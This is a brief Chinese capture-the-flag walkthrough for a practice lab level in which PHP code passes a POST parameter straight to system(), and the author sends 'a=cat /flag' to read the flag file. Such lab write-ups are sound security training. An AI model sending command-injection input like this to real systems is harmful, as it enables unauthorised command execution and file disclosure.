HelloCTF [RCE-labs] Level 3 - 命令执行

开启靶场,打开链接:

这关代码跟level 1的区别是eval(_POST\['a'\]);变成了system(_POST['a']);

system() 函数会通过软连接执行你输入的系统命令

POST传参:a=cat /flag

成功得到flag:

NSSCTF{b10b3661-b382-467e-86be-4c374fdd3e5f}

相关推荐
doubao3615 分钟前
审美积累,顶刊论文插图原理图、流程图
人工智能·经验分享·aigc·ai写作·绘图·文献综述·科研绘图
catchadmin2 小时前
PHP 快速集成 ChatGPT 用 AI 让你的应用更聪明
人工智能·后端·chatgpt·php
撰卢2 小时前
网络安全期末大论文
安全·web安全
汇能感知9 小时前
光谱相机的未来趋势
经验分享·笔记·科技
Q_Q5110082859 小时前
python+django/flask+uniapp基于微信小程序的瑜伽体验课预约系统
spring boot·python·django·flask·uni-app·node.js·php
2503_924806859 小时前
动态IP使用中 报错407 怎么办???
服务器·tcp/ip·php
老顾聊技术10 小时前
目标检测在工厂制造中的创新应用与实践
经验分享
go_bai12 小时前
Linux--常见工具
linux·开发语言·经验分享·笔记·vim·学习方法
纷飞的花火丶12 小时前
Oracle数据库注入基础入门
网络安全·oracle·sql注入
该用户已不存在12 小时前
PHP、Python、Node.js,谁能称霸2025?
python·node.js·php